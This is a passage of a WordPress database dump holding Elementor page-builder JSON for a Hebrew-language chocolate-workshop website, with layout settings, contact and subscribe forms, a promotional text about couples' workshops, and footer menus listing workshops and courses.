\\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(456,108,'_elementor_version','0.4'),(458,109,'_elementor_template_type','section'),(459,109,'_elementor_edit_mode','builder'),(460,110,'_elementor_template_type','page'),(461,110,'_elementor_edit_mode','builder'),(462,109,'_wp_page_template','default'),(463,109,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false}]'),(464,111,'_elementor_template_type','page'),(465,111,'_elementor_edit_mode','builder'),(466,111,'_wp_page_template','default'),(467,111,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false}]'),(468,109,'_elementor_version','0.4'),(471,112,'_wp_page_template','elementor_canvas'),(472,112,'_elementor_edit_mode','builder'),(473,112,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 